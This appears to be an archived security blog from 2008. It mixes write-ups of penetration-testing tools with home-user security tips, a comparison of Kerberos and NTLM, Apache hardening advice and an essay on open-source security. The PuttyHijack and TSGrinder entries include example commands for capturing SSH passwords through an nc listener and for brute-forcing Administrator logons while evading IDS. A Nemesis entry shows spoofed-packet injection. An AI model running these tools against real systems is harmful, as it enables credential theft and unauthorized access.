10/22/08
PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows
This can be useful during penetration tests when a Windows box that has been compromised is used to SSH/Telnet into other servers. The injected DLL installs some hooks and creates a socket for a callback connection that is then used for input/output redirection.
It does not kill the current connection, and will cleanly uninject if the socket or process is stopped.
Details
1) Start an nc listener
2) Run PuttyHijack, specifying the listener IP and port
3) Watch the echoing of everything, including passwords
Some basic commands in this version include:
!disco - disconnect the real PuTTY from the display
!reco - reconnect it
!exit - just another way to exit the injected shell
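As a rough sketch of the workflow (the addresses, port and exact argument order here are assumptions, so check the tool's own usage output):

On the listening box:
nc -l -p 4444

On the compromised Windows host:
PuttyHijack.exe 192.168.0.10 4444

Everything typed into the hijacked PuTTY session, passwords included, should then echo back to the nc window.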
You can download PuttyHijack V1.0 here:
PuttyHijackV1.0.rar
Or read more here.
TSGrinder - Brute Force Terminal Services Server
TSGrinder is the first production Terminal Server brute force tool, and is now in release 2. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. And having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts.
TSGrinder is a “dictionary” based attack tool, but it does have some interesting features like “l337” conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection.
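A hedged example invocation (the flag names are assumptions based on the tool's usage notes, so verify them with tsgrinder -h first):

tsgrinder.exe -w dictionary.txt -l leet -u administrator -n 2 192.168.0.20

This would run each dictionary word, plus its “l337” variants, against the Administrator account on the target server, using two simultaneous attack windows.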
You can download TSGrinder 2.0.3 here:
tsgrinder-2.03.zip
Note that the tool requires the Microsoft Simulated Terminal Server Client tool, “roboclient,” which may be found here:
roboclient.zip
Or read more here.
Vista Security Feature - Teredo Protocol Analysis
Primary concerns include bypassing security controls, reducing defense in depth, and allowing unsolicited traffic. Additional security concerns associated with the use of Teredo include the capability of remote nodes to open the NAT for themselves, benefits to worms, ways to deny Teredo service, and the difficulty in finding all Teredo traffic to inspect.
You can find the report here:
Teredo Security [PDF]
Fake NetBIOS Tool - Simulate Windows Hosts
FakeNetBIOS is a family of tools designed to simulate Windows hosts on a LAN. The individual tools are:
FakeNetbiosDGM (NetBIOS Datagram)
FakeNetbiosNS (NetBIOS Name Service)
Each tool can be used as a standalone tool or as a honeyd responder or subsystem.
FakeNetbiosDGM sends NetBIOS Datagram service packets on UDP port 138 to simulate Windows host broadcasts. It periodically sends NetBIOS announcements over the network to simulate Windows computers, fooling the Computer Browser services running on the LAN, and so on.
FakeNetbiosNS is a NetBIOS Name Service daemon, listening on UDP port 137. It responds to NetBIOS Name requests like a real Windows computer would: for example, to 'ping -a', 'nbtstat -A' and 'nbtstat -a'.
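To check that the simulated host is answering name-service requests, you can query it from a real Windows box (the address is just an example):

C:\> nbtstat -A 192.168.0.99
C:\> ping -a 192.168.0.99

Both should resolve names served by the FakeNetbiosNS daemon just as they would for a genuine Windows host.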
You can download the tools here:
FakeNetBIOS-0.91.zip
There are a few other things here:
http://honeynet.rstack.org/tools.php
Nemesis - Packet Injection Suite
Nemesis can natively craft and inject packets for:
ARP
DNS
ETHERNET
ICMP
IGMP
IP
OSPF
RIP
TCP
UDP
Using the IP and the Ethernet injection modes, almost any custom packet can be crafted and injected.
Unix-like systems require: libnet-1.0.2a and a C compiler (GCC)
Windows systems require: libnetNT-1.0.2g and either WinPcap-2.3 or WinPcap-3.0
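As a quick sketch of the command-line style (the addresses are examples; double-check the flags against each protocol injector's help output):

nemesis tcp -v -S 192.168.0.5 -D 192.168.0.1 -fS -y 22

This crafts and injects a single TCP SYN packet to port 22 of the target, with a spoofed source address.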
Download it here:
Source code: nemesis-1.4.tar.gz (Build 26)
Windows binary: nemesis-1.4.zip (Build 26) (includes LibnetNT)
You can read more here:
Nemesis at SourceForge
ARP Scanning and Fingerprinting Tool - arp-scan
It has been tested under various Linux based operating systems and seems to work fine.
This will only compile on Linux systems. You will need a C compiler, the “make” utility and the appropriate system header files to compile arp-scan. It uses autoconf and automake, so compilation and installation is the normal ./configure; make; make install process.
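For example, after the usual build and install:

./configure
make
make install
arp-scan --interface=eth0 192.168.0.0/24

The last command sends ARP requests to every address in the local /24 and lists each host that replies, along with its MAC address and vendor.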
You can download arp-scan here:
http://www.nta-monitor.com/tools/arp-scan/download/arp-scan-1.4.tar.gz
Please read the man pages arp-scan(1), arp-fingerprint(1) and get-oui(1) before using this tool.
Babel Enterprise - Cross Platform System Auditing Tool
Babel Enterprise has been designed to manage security on many different systems, with different technologies and versions and different issues and requirements. It is a distributed, multi-user management system that allows redundant installation of all its critical components. Each change occurring in a system can be watched and marked automatically each time a new audit policy is executed. Users can add, delete or modify existing elements to see exactly whether the system works better or worse, and why. Babel Enterprise takes a pragmatic approach, evaluating those aspects of the system that represent a security risk and that can be improved with the intervention of an administrator.
Babel Enterprise has a version of its agent for each of the latest Microsoft operating systems, Windows 2003 and Windows XP, and the main Unix systems: Solaris 10, AIX 5.x, SUSE GNU/Linux 9 ES and Ubuntu Dapper, although these can be easily adapted to other versions and other Unix OSs (such as BSD or HP-UX).
Babel currently has modules for auditing many different aspects of system security. These are some examples of currently implemented audit modules:
Service minimization.
Centralized file hashing.
Anomalous SUID0 executable detection.
File permissions checker.
Password strength tests.
Generic registry lookup (Windows).
Remote services configuration.
Audit for kernel networking and security parameters.
Apache2 configuration auditing.
User accounts auditing.
Root environment audit.
UID0 users detection.
Centralized patch management.
Centralized software inventory.
Listening ports auditing.
Inetd / Xinetd minimization.
You can download the latest stable version of Babel Enterprise here:
Babel Enterprise 1.0 version.
Or read more here.
Using the capture command in a Cisco Systems PIX firewall
A packet sniffer is a vital tool for troubleshooting network problems and monitoring computer networks. That being said, one of the best methods for troubleshooting connection problems or monitoring suspicious network activity on a Cisco Systems PIX firewall is the capture command. Cisco TAC will often request captures from a PIX in PCAP format for open problem tickets involving unusual problems or activity on the PIX and the network.
Cisco kit can be a bit daunting for a newcomer, but it is very well featured; it's important to learn what your PIX can do!
The capture command was first introduced to the PIX OS in version 6.2 and has the ability to capture all data that passes through the PIX device. You can use access-lists to specify the type of traffic that you wish to capture, along with the source and destination addresses and ports. Multiple capture statements can be used to attach the capture command to multiple interfaces. You can even copy the raw header and hexadecimal data in PCAP format to a tftp server and open it with TCPDUMP or Ethereal.
NOTE: You must be in privileged mode to invoke the capture command.
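A sketch of a typical capture session (the names and addresses are placeholders):

pix(config)# access-list capacl permit tcp any host 10.1.1.5 eq 80
pix(config)# capture webcap access-list capacl interface inside
pix# show capture webcap
pix# copy capture:webcap tftp://10.1.1.20/webcap.pcap pcap

The final command writes the capture in PCAP format to a tftp server, where it can be opened with TCPDUMP or Ethereal.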
Full article here.
IPAudit - Network Activity Monitor with Web Interface
IPAudit can be used to monitor network activity for a variety of purposes. It has proved useful for intrusion detection and for monitoring bandwidth consumption and denial of service attacks. It can be used with IPAudit-Web to provide web based network reports.
IPAudit is a free network monitoring program available and extensible under the GNU GPL.
IPAudit is a command line tool that uses the libpcap library to listen to traffic and generate data. The IPAudit-Web package includes the IPAudit binary in addition to the web interface that creates reports based on the collected data. Using the Web package is recommended, as it gives you a slick graphical interface complete with traffic charts and a search feature.
You can download IPAudit here:
IPAudit 0.95 - Latest stable version of IPAudit
Or read more here.
You can also find a very good introduction to IPAudit by SecurityFocus here.
argus - Auditing Network Activity - Performance & Status Monitoring
Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information.
Argus can be used to analyze and report on the contents of packet capture files, or it can run as a continuous monitor, examining data from a live interface and generating an audit log of all the network activity seen in the packet stream. Argus can be deployed to monitor individual end-systems or an entire enterprise's network activity. As a continuous monitor, Argus provides both push and pull data handling models, allowing flexible strategies for collecting network audit data. Argus data clients support a range of operations, such as sorting, aggregation, archival and reporting. There is XML support for Argus data, which makes handling Argus data a bit easier.
Argus currently runs on Linux, Solaris, FreeBSD, OpenBSD, NetBSD, and Mac OS X, and its client programs have also been ported to Cygwin. The software should be portable to many versions of Unix with little or no modification. Performance is such that auditing an entire enterprise's Internet activity can be accomplished using modest computing resources.
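A minimal run might look like this (the interface and file names are examples):

argus -i eth0 -w /var/log/argus.out
ra -r /var/log/argus.out - tcp and host 192.168.0.5

The first command audits a live interface into a flow log; the second uses the ra client to read it back, filtered to TCP traffic involving a single host.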
You can download argus here:
argus-2.0.6 (various options available)
Or read more here.
SlavaSoft FSUM and HashCalc - MD5 & File Integrity for Windows
You can easily use FSUM with a batch wrapper to do automated file integrity monitoring, and use something like blat to email you any differences.
The most common use for FSUM is checking data files for corruption. A message digest or checksum calculation might be performed on data before transferring it from one location to another. By making the same calculation after the transfer and comparing the before and after results, you can determine whether the received data is corrupted. If the results match, the received data is likely accurate.
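A sketch of the batch-wrapper idea (the fsum and blat switches shown are assumptions to verify against each tool's help):

fsum -r -md5 c:\data\*.* > c:\baseline\current.md5
fc c:\baseline\known-good.md5 c:\baseline\current.md5 > c:\baseline\diff.txt
blat c:\baseline\diff.txt -to admin@example.com -s "File integrity changes"

Run from Task Scheduler, this recalculates the checksums, compares them against a known-good list, and mails you any differences.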
You can download FSUM here:
FSUM 2.52
Or read more here.
raWPacket HeX - Network Security Monitoring & Analysis LiveCD
HeX Main Features
HeX Main Menu - A cleaner, more user-interface-oriented look with a maximum of 4 levels of depth; the HeX Main Menu allows quick access to all the applications installed in HeX.
Terminal - This is exactly what you need, the ultimate analyst console!
Instant access to all the Network Security Monitoring (NSM) and Network Based Forensics (NBF) Toolkits via the Fluxbox Menu. We have also categorized them nicely so that you know what to use for a given condition or scenario.
Instant access to the Network Visualization Toolkit; you can watch network traffic in a graphical presentation, which helps you identify large scale network attacks easily.
Instant access to Pcap Editing Tools, which you can use to modify or anonymize pcap data; this is great especially when you want to share your pcap data.
The Network and Pentest Toolkits contain a lot of tools for performing network or application based attacks; you can generate malicious packets using them and study those packets using the analysis tools listed in the NSM-Toolkit and NBF-Toolkit as well.
While we think the HeliX LiveCD is a better choice for a digital forensics arsenal, the Forensics-Toolkit can be considered an add-on for people who are interested in doing digital forensics.
Under Applications there are Desktop, Sysutils and Misc, all of which are pretty self-explanatory and contain user applications such as Firefox, Liferea, Xpdf and so forth. Additionally, Misc contains some useful scripts; for example, you can start the ssh service just by clicking on SSHD-Start.
You can download HeX 1.0.3 here:
hex-i386-1.0.3.iso
NetworkMiner - Passive Sniffer & Packet Analysis Tool for Windows
NetworkMiner makes use of OS fingerprinting databases from both p0f (by Michal Zalewski) and Ettercap (by Alberto Ornaghi and Marco Valleri) in order to do passive OS fingerprinting as correctly as possible. NetworkMiner also uses the MAC-vendor list from Nmap (Fyodor).
The purpose of NetworkMiner is to collect data about hosts on the network rather than to collect data regarding the traffic on the network. The main view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames).
NetworkMiner can extract files transferred over the network by parsing a PCAP file or by sniffing traffic directly from the network. This is a neat function that can be used to extract and save media files (such as audio or video files) which are streamed across a network.
Another very useful feature is that the user can search sniffed or stored data for keywords. NetworkMiner allows the user to insert arbitrary string or byte-patterns to be searched for with the keyword search functionality.
A feature the author wants to include in future versions of NetworkMiner is the use of statistical methods to do protocol identification (protocol fingerprinting) of a TCP session or UDP data. This means that instead of looking at the port number to guess which protocol is used on top of the TCP/UDP packet, NetworkMiner will identify the correct protocol based on the TCP/UDP packet content. In this way NetworkMiner will be able to identify protocols even if the service is run on a non-standard port.
You can download NetworkMiner here:
NetworkMiner-0.82
Or you can read more here.
SWFIntruder - Analysis and Security Testing of Flash Applications
I did mention a Flash decompiler a while back; now we have SWFIntruder (pronounced Swiff Intruder), which is apparently the first tool specifically developed for analyzing and testing the security of Flash applications at runtime.
It helps to find flaws in Flash applications using the methodology originally described in Testing Flash Applications and in Finding Vulnerabilities in Flash Applications.
Features
Basic predefined attack patterns.
Highly customizable attacks.
Highly customizable undefined variables.
Semi automated XSS check.
User configurable internal parameters.
Log Window for debugging and tracking.
History of latest 5 tested SWF files.
ActionScript Objects runtime explorer in tree view.
Persistent Configuration and Layout.
SWFIntruder was developed using ActionScript, HTML and JavaScript, resulting in a tool that takes advantage of the best features of those technologies to get the best capabilities for analyzing and interacting with the Flash movies under test.
SWFIntruder was developed using only open source software. Thanks to its generality, SWFIntruder is OS independent.
You can download SWFIntruder here:
swfintruder-0.9.1.tgz
Or read more here.
lm2ntcrack - Microsoft Windows NT Hash Cracker (MD4 -LM)
This tool instantly cracks the Microsoft Windows NT hash (MD4) when the LM password is already known; you might be familiar with LM cracking tools such as LCP.
The main problem is that you've got the LM password, but it's in UPPERCASE because LM hashes are not case sensitive, so you still need to find the actual password for the account.
Example : Password cracker output for “Administrator” account
LM password is ADMINISTRAT0R.
NT password is ?????????????.
We aren’t lucky because the case-sensitive password isn’t “administrat0r” or “Administrat0r”. So you cannot use this to connect to the audited Windows system.
This password contains 13 characters, but launching my password cracker on the NT hash would be a waste of time with a poor chance of success.
Note :
Password length : 13 characters.
Details : 1 number + 12 case-sensitive letters.
Possibilities : 2^12 = 4096 choices.
In this example, lm2ntcrack will generate the 4096 case permutations of the password ADMINISTRAT0R and, for each one, the associated NT MD4 hash, then search for a match against the dumped hash.
Execution time : < 2 seconds to crack more than 1200 NT Hashes.
You can download lm2ntcrack here:
lm2ntcrack-current.tgz
Or read more here.
10/21/08
Tips for safe computing
But that's not true, and the reality is more complicated. You're screwed if you do nothing to protect yourself, but there are many things you can do to increase your security on the Internet.
Two years ago, I published a list of PC security recommendations. The idea was to give home users concrete actions they could take to improve security. This is an update of that list: a dozen things you can do to improve your security.
General
Turn off the computer when you're not using it, especially if you have an "always on" Internet connection.
Laptop security
Keep your laptop with you at all times when not at home; treat it as you would a wallet or purse. Regularly purge unneeded data files from your laptop. The same goes for PDAs. People tend to store more personal data--including passwords and PINs--on PDAs than they do on laptops.
Backups
Back up regularly. Back up to disk, tape or CD-ROM. There's a lot you can't defend against; a recent backup will at least let you recover from an attack. Store at least one set of backups off-site (a safe-deposit box is a good place) and at least one set on-site. Remember to destroy old backups. The best way to destroy CD-Rs is to microwave them on high for five seconds. You can also break them in half or run them through better shredders.
Operating systems
If possible, don't use Microsoft Windows. Buy a Macintosh or use Linux. If you must use Windows, set up Automatic Update so that you automatically receive security patches. And delete the files "command.com" and "cmd.exe."
Applications
Limit the number of applications on your machine. If you don't need it, don't install it. If you no longer need it, uninstall it. Look into one of the free office suites as an alternative to Microsoft Office. Regularly check for updates to the applications you use and install them. Keeping your applications patched is important, but don't lose sleep over it.
Browsing
Don't use Microsoft Internet Explorer, period. Limit use of cookies and applets to those few sites that provide services you need. Set your browser to regularly delete cookies. Don't assume a Web site is what it claims to be, unless you've typed in the URL yourself. Make sure the address bar shows the exact address, not a near-miss.
Web sites
Secure Sockets Layer (SSL) encryption does not provide any assurance that the vendor is trustworthy or that its database of customer information is secure.
Think before you do business with a Web site. Limit the financial and personal data you send to Web sites--don't give out information unless you see a value to you. If you don't want to give out personal information, lie. Opt out of marketing notices. If the Web site gives you the option of not storing your information for later use, take it. Use a credit card for online purchases, not a debit card.
Passwords
You can't memorize good enough passwords any more, so don't bother. For high-security Web sites such as banks, create long random passwords and write them down. Guard them as you would your cash: i.e., store them in your wallet, etc.
Never reuse a password for something you care about. (It's fine to have a single password for low-security sites, such as for newspaper archive access.) Assume that all PINs can be easily broken and plan accordingly.
Never type a password you care about, such as for a bank account, into a non-SSL encrypted page. If your bank makes it possible to do that, complain to them. When they tell you that it is OK, don't believe them; they're wrong.
E-mail
Turn off HTML e-mail. Don't automatically assume that any e-mail is from the "From" address.
Delete spam without reading it. Don't open messages with file attachments, unless you know what they contain; immediately delete them. Don't open cartoons, videos and similar "good for a laugh" files forwarded by your well-meaning friends; again, immediately delete them.
Never click links in e-mail unless you're sure about the e-mail; copy and paste the link into your browser instead. Don't use Outlook or Outlook Express. If you must use Microsoft Office, enable macro virus protection; in Office 2000, turn the security level to "high" and don't trust any received files unless you have to. If you're using Windows, turn off the "hide file extensions for known file types" option; it lets Trojan horses masquerade as other types of files. Uninstall the Windows Scripting Host if you can get along without it. If you can't, at least change your file associations, so that script files aren't automatically sent to the Scripting Host if you double-click them.
Antivirus and anti-spyware software
Use it--either a combined program or two separate programs. Download and install the updates, at least weekly and whenever you read about a new virus in the news. Some antivirus products automatically check for updates. Enable that feature and set it to "daily."
Firewall
Spend $50 for a Network Address Translator firewall device; it's likely to be good enough in default mode. On your laptop, use personal firewall software. If you can, hide your IP address. There's no reason to allow any incoming connections from anybody.
Encryption
Install an e-mail and file encryptor (like PGP). Encrypting all your e-mail or your entire hard drive is unrealistic, but some mail is too sensitive to send in the clear. Similarly, some files on your hard drive are too sensitive to leave unencrypted.
None of the measures I've described are foolproof. If the secret police wants to target your data or your communications, no countermeasure on this list will stop them. But these precautions are all good network-hygiene measures, and they'll make you a more difficult target than the computer next door. And even if you only follow a few basic measures, you're unlikely to have any problems.
I'm stuck using Microsoft Windows and Office, but I use Opera for Web browsing and Eudora for e-mail. I use Windows Update to automatically get patches and install other patches when I hear about them. My antivirus software updates itself regularly. I keep my computer relatively clean and delete applications that I don't need. I'm diligent about backing up my data and about storing data files that are no longer needed offline.
I'm suspicious to the point of near-paranoia about e-mail attachments and Web sites. I delete cookies and spyware. I watch URLs to make sure I know where I am, and I don't trust unsolicited e-mails. I don't care about low-security passwords, but try to have good passwords for accounts that involve money. I still don't do Internet banking. I have my firewall set to deny all incoming connections. And I turn my computer off when I'm not using it.
That's basically it. Really, it's not that hard. The hardest part is developing an intuition about e-mail and Web sites. But that just takes experience.
10/20/08
Kerberos VS NTLM
NTLM Authentication: Challenge-Response mechanism.
In the NTLM protocol, the client sends the user name to the server; the server generates and sends a challenge to the client; the client encrypts that challenge using the user's password; and the client sends a response to the server. If it is a local user account, the server validates the user's response by looking into the Security Account Manager; if it is a domain user account, the server forwards the response to a domain controller for validation and retrieves the group policy of the user account, then constructs an access token and establishes a session for the user.
Kerberos authentication: Trusted Third-Party scheme.
Kerberos authentication provides a mechanism for mutual authentication between a client and a server on an open network. The three heads of Kerberos comprise the Key Distribution Center (KDC), the client user, and the server with the desired service to access. The KDC is installed as part of the domain controller and performs two service functions: the Authentication Service (AS) and the Ticket-Granting Service (TGS). When the client user logs on to the network, it requests a Ticket-Granting Ticket (TGT) from the AS in the user's domain. Then, when the client wants to access network resources, it presents the TGT, an authenticator, and the Service Principal Name (SPN) of the target server, and contacts the TGS in the service account domain to retrieve a session ticket for future communication with the network service. Once the target server validates the authenticator, it creates an access token for the client user.
NTLM is a challenge/response-based authentication protocol that is the default authentication protocol of Windows NT 4.0 and earlier Windows versions. For backward compatibility reasons, Microsoft still supports NTLM in Windows Vista, Windows Server 2003 and Windows Server 2003 R2, Windows 2000, and Windows XP.
Starting with Win2K, Microsoft implements Kerberos as the default authentication protocol for the Windows OS. This means that besides an NTLM authentication provider, every Windows OS since Win2K also includes a client Kerberos authentication provider.
The next paragraphs compare Kerberos to NTLM, the default authentication protocol of NT 4.0 and earlier Windows versions, expanding on some of the major feature differences between the two authentication protocols and explaining why Kerberos is generally considered a better authentication option than NTLM.
Faster authentication. When a resource server gets Kerberos authentication information (in Kerberos speak, "tickets" and "authenticators") from a client, the resource server has enough information to authenticate the client. The NTLM authentication protocol requires resource servers that aren't domain controllers (DCs) to contact a DC to validate a user's authentication request. This process is known as pass-through authentication. Thanks to its unique ticketing system, Kerberos doesn't need pass-through authentication and therefore accelerates the authentication process.
Mutual authentication. Kerberos can support mutual authentication. Mutual authentication means that not only the client authenticates to the service, but also the service authenticates to the client. Mutual authentication is a Kerberos option that the client can request. The support for mutual authentication is a key difference between Kerberos and NTLM. The NTLM challenge-response mechanism only provides client authentication. In the NTLM authentication exchange, the server generates an NTLM challenge for the client, the client calculates an NTLM response, and the server validates that response. Using NTLM, users might provide their credentials to a bogus server.
Kerberos is an open standard. Microsoft based its Kerberos implementation on the standard defined in Request for Comments (RFC) 4120. RFC 4120 defines version 5 of the Kerberos protocol. Because Kerberos is defined in an open standard, it can provide single sign-on (SSO) between Windows and other OSs supporting an RFC 4120-based Kerberos implementation. You can download RFC 4120 from the Internet Engineering Task Force (IETF) at http://www.ietf.org. NTLM is a proprietary authentication protocol defined by Microsoft. The NTLM protocol is not specified in an open standard document (for example in an IETF RFC).
Support for authentication delegation. Thanks to authentication delegation, a service can access remote resources on behalf of a user. What delegation really means is that user A can give rights to an intermediary machine B to authenticate to an application server C as if machine B was user A. This means that application server C will base its authorization decisions on user A's identity rather than on machine B's account. Delegation is also known as authentication forwarding. You can use delegation for authentication in multi-tier applications. An example is database access using a Web-based front-end application. In a multi-tier application, authentication happens on different tiers. In such a setup, if you want to set authorization on the database using the user's identity, you should be capable of using the user's identity for authentication both on the Web server and the database server. This is impossible if you use NTLM for authentication on every link, simply because NTLM doesn't support delegation.
Support for smart card logon. Through the Kerberos PKINIT extension, Win2K and later versions include support for the smart card logon security feature. Smart card logon provides much stronger authentication than password logon because it relies on a two-factor authentication. To log on, a user needs to possess a smart card and know its PIN code. Smart card logon also offers other security advantages. For example, it can block Trojan horse attacks that try to grab a user's password from the system memory. The NTLM authentication protocol doesn't support smart card logon.
10/16/08
Apache Security Tips
The Apache HTTP Server has a good record for security and a developer community highly concerned about security issues. But it is inevitable that some problems -- small or large -- will be discovered in software after it is released. For this reason, it is crucial to keep aware of updates to the software. If you have obtained your version of the HTTP Server directly from Apache, we highly recommend you subscribe to the Apache HTTP Server Announcements List where you can keep informed of new releases and security updates. Similar services are available from most third-party distributors of Apache software.
Of course, most times that a web server is compromised, it is not because of problems in the HTTP Server code. Rather, it comes from problems in add-on code, CGI scripts, or the underlying Operating System. You must therefore stay aware of problems and updates with all the software on your system.
Permissions on ServerRoot Directories
In typical operation, Apache is started by the root user, and it switches to the user defined by the User directive to serve hits. As is the case with any command that root executes, you must take care that it is protected from modification by non-root users. Not only must the files themselves be writeable only by root, but so must the directories, and parents of all directories. For example, if you choose to place ServerRoot in /usr/local/apache then it is suggested that you create that directory as root, with commands like these:
mkdir /usr/local/apache
cd /usr/local/apache
mkdir bin conf logs
chown 0 . bin conf logs
chgrp 0 . bin conf logs
chmod 755 . bin conf logs
It is assumed that /, /usr, and /usr/local are only modifiable by root. When you install the httpd executable, you should ensure that it is similarly protected:
cp httpd /usr/local/apache/bin
chown 0 /usr/local/apache/bin/httpd
chgrp 0 /usr/local/apache/bin/httpd
chmod 511 /usr/local/apache/bin/httpd
You can create an htdocs subdirectory which is modifiable by other users -- since root never executes any files out of there, and shouldn't be creating files in there.
If you allow non-root users to modify any files that root either executes or writes on then you open your system to root compromises. For example, someone could replace the httpd binary so that the next time you start it, it will execute some arbitrary code. If the logs directory is writeable (by a non-root user), someone could replace a log file with a symlink to some other system file, and then root might overwrite that file with arbitrary data. If the log files themselves are writeable (by a non-root user), then someone may be able to overwrite the log itself with bogus data.
Server Side Includes
Server Side Includes (SSI) present a server administrator with several potential security risks.
The first risk is the increased load on the server. All SSI-enabled files have to be parsed by Apache, whether or not there are any SSI directives included within the files. While this load increase is minor, in a shared server environment it can become significant.
SSI files also pose the same risks that are associated with CGI scripts in general. Using the exec cmd element, SSI-enabled files can execute any CGI script or program under the permissions of the user and group Apache runs as, as configured in httpd.conf.
There are ways to enhance the security of SSI files while still taking advantage of the benefits they provide.
To isolate the damage a wayward SSI file can cause, a server administrator can enable suexec as described in the CGI in General section.
Enabling SSI for files with .html or .htm extensions can be dangerous. This is especially true in a shared, or high traffic, server environment. SSI-enabled files should have a separate extension, such as the conventional .shtml. This helps keep server load at a minimum and allows for easier management of risk.
Another solution is to disable the ability to run scripts and programs from SSI pages. To do this replace Includes with IncludesNOEXEC in the Options directive. Note that users may still use <!--#include virtual="..." --> to execute CGI scripts if these scripts are in directories designated by a ScriptAlias directive.
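For example, a minimal Apache 1.3-style configuration along these lines (the path is a placeholder) might be:

AddType text/html .shtml
AddHandler server-parsed .shtml
<Directory /usr/local/apache/htdocs>
    Options IncludesNOEXEC
</Directory>

With this, only .shtml files are parsed for SSI directives, and the exec element is disabled for them.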
CGI in General
First of all, you always have to remember that you must trust the writers of the CGI scripts/programs or your ability to spot potential security holes in CGI, whether they were deliberate or accidental. CGI scripts can run essentially arbitrary commands on your system with the permissions of the web server user and can therefore be extremely dangerous if they are not carefully checked.
All the CGI scripts will run as the same user, so they have potential to conflict (accidentally or deliberately) with other scripts e.g. User A hates User B, so he writes a script to trash User B's CGI database. One program which can be used to allow scripts to run as different users is suEXEC which is included with Apache as of 1.2 and is called from special hooks in the Apache server code. Another popular way of doing this is with CGIWrap.
Non Script Aliased CGI
Allowing users to execute CGI scripts in any directory should only be considered if:
You trust your users not to write scripts which will deliberately or accidentally expose your system to an attack.
You consider security at your site to be so feeble in other areas, as to make one more potential hole irrelevant.
You have no users, and nobody ever visits your server.
Script Aliased CGI
Limiting CGI to special directories gives the admin control over what goes into those directories. This is inevitably more secure than non script aliased CGI, but only if users with write access to the directories are trusted or the admin is willing to test each new CGI script/program for potential security holes.
Most sites choose this option over the non script aliased CGI approach.
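A typical script-aliased setup (the paths are examples) looks like this:

ScriptAlias /cgi-bin/ /usr/local/apache/cgi-bin/
<Directory /usr/local/apache/cgi-bin>
    AllowOverride None
    Options None
</Directory>

Only programs the admin places in that one directory are executed as CGI; everything else is served as plain content.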
Other sources of dynamic content
Embedded scripting options which run as part of the server itself, such as mod_php, mod_perl, mod_tcl, and mod_python, run under the identity of the server itself (see the User directive), and therefore scripts executed by these engines potentially can access anything the server user can. Some scripting engines may provide restrictions, but it is better to be safe and assume not.
Protecting System Settings
To run a really tight ship, you'll want to stop users from setting up .htaccess files which can override security features you've configured. Here's one way to do it.
In the server configuration file, put
<Directory />
    AllowOverride None
</Directory>
This prevents the use of .htaccess files in all directories apart from those specifically enabled.
Protect Server Files by Default
One aspect of Apache which is occasionally misunderstood is the feature of default access. That is, unless you take steps to change it, if the server can find its way to a file through normal URL mapping rules, it can serve it to clients.
For instance, consider the following example:
# cd /; ln -s / public_html
Accessing http://localhost/~root/
This would allow clients to walk through the entire filesystem. To work around this, add the following block to your server's configuration:
<Directory />
    Order Deny,Allow
    Deny from all
</Directory>
This will forbid default access to filesystem locations. Add appropriate Directory blocks to allow access only in those areas you wish.
For example,
<Directory /usr/users/*/public_html>
    Order Deny,Allow
    Allow from all
</Directory>
<Directory /usr/local/httpd>
    Order Deny,Allow
    Allow from all
</Directory>
Pay particular attention to the interactions of Location and Directory directives; for instance, even if <Directory /> denies access, a <Location /> directive might overturn it.
Also be wary of playing games with the UserDir directive; setting it to something like ./ would have the same effect, for root, as the first example above. If you are using Apache 1.3 or above, we strongly recommend that you include the following line in your server configuration files:
UserDir disabled root
Watching Your Logs
To keep up to date with what is actually going on against your server, you have to check the log files. Even though the log files only report what has already happened, they will give you some understanding of what attacks are being thrown against the server and allow you to check whether the necessary level of security is present.
A couple of examples:
grep -c "/jsp/source.jsp?/jsp/ /jsp/source.jsp??" access_log
grep "client denied" error_log tail -n 10
The first example will list the number of attacks trying to exploit the Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability, the second example will list the ten last denied clients, for example:
[Thu Jul 11 17:18:39 2002] [error] [client foo.bar.com] client denied by server configuration: /usr/local/apache/htdocs/.htpasswd
As you can see, the log files only report what already has happened, so if the client had been able to access the .htpasswd file you would have seen something similar to:
foo.bar.com - - [12/Jul/2002:01:59:13 +0200] "GET /.htpasswd HTTP/1.1"
in your Access Log.
This means you probably commented out the following in your server configuration file:
<Files ~ "^\.ht">
    Order allow,deny
    Deny from all
</Files>
How Secure Is Open Source?
The debate surrounding which is best, open source (often free) software or closed source commercial software, continues to rage. Proponents of open source claim that it not only saves money, but is also inherently more secure. The first claim might seem to be a given (although once you factor in learning curve, administrative overhead and support – or lack thereof – “free” software doesn’t always have as much of a TCO advantage as it would seem). The second claim is what we’ll discuss in this article. Is open source really inherently more secure than closed source commercial software? If so, why? And if not, why do so many have that perception?
What is Open Source, Anyway?
Before we can intelligently discuss the differences between open source and proprietary software, we need to clarify what the term really means. Many people equate “open source” with “free of charge,” but that’s not necessarily the case. Open source code can be – and is – the basis for products such as RedHat and dozens of other commercial distributions of Linux that range in cost from a few dollars to a few thousand (RedHat Enterprise Linux premium edition lists at $2499 for Intel x86, up to $18,000 for IBM S/390).
“Open source” also does not mean “unlicensed.” In fact, there are a whole slew of licenses under which open source software is distributed. Some of the most popular include GPL (the GNU Public License), BSD, and the Mozilla Public License. The Open Source Initiative (OSI), a non-profit corporation, has developed a certification process for licenses. You can see a list of open source licenses approved by OSI at http://opensource.org/licenses/.
The name itself tells the story: open source software means the source code (the programming often written in C, C++ or even assembler language) is available to anyone who wants it, and can be examined, changed and used to write additional programming. This is in contrast to “closed” or proprietary software such as Microsoft Windows, for which the source code is a closely guarded trade secret (except when it’s leaked to the public).
When Closed Source Comes Open
Which brings us to recent events: in early February, it was reported that part of the source code for Windows NT 4.0 and Windows 2000 had been leaked to the Internet. Files containing the code were posted to a number of P2P sites and were being eagerly downloaded. The available code comprised only a small portion of the entire code base for the operating systems, but the incident caused a great deal of consternation, both at Redmond and within the IT community.
Microsoft was understandably concerned about its intellectual property rights, but IT pundits played up the security angle. Many unnamed (and some named) “security experts” were quoted as saying the leaks of the source code present a serious security issue, and that hackers could use the information to launch new and improved attacks against the Windows operating systems.
Does This Mean Open Source is Less Secure?
These claims must seem confusing to those who have been listening to open source proponents, who for years have told us that their software is more secure precisely because the source code is readily available to everyone. If having the code “out there” makes Linux more secure, why would the same thing make Windows less secure?
